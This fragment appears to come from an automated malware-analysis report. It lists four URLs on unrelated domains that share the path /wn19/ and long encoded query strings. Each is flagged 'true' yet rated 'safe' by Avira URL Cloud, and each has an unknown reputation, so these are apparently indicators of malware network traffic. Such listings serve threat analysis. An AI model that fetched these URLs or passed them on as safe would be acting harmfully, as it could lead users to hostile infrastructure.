http://www.nelvashop.com/wn19/?jZf=74kz/+Omydv/tJV+ps5/T47bI5nxKh+DjdkrvIsUcwHn/m5f3NJjyQUUG1A7gP1GNjyQ&k0=p8cH true
  • Avira URL Cloud: safe
 unknown
http://www.herbalsfixng.xyz/wn19/?jZf=/aPRIOivZv/SK3yyBSrwMHS3aEcDnGoJdVwaw0Jv+PFvpIBjQ3dFVdba2CvjMIDrv82h&1biX=C2MPnN true
  • Avira URL Cloud: safe
 unknown
http://www.fungismartgrid.com/wn19/?jZf=NS202dJbEEETcB12VfvBfMMdjzaMJ2P7TP19ar/APX8BBmPLqx20W3tmhoszgkcRlb4O&1biX=C2MPnN true
  • Avira URL Cloud: safe
 unknown
http://www.schnellekreditfinanz.com/wn19/?jZf=VPEU4GtrlSiNcAkb3jQiBQiB6wsnkRv+1lt8CI/dwo4hrc1cBv2ecJ2q6A5CexHOXEVq&1biX=C2MPnN true
  • Avira URL Cloud: safe
 unknown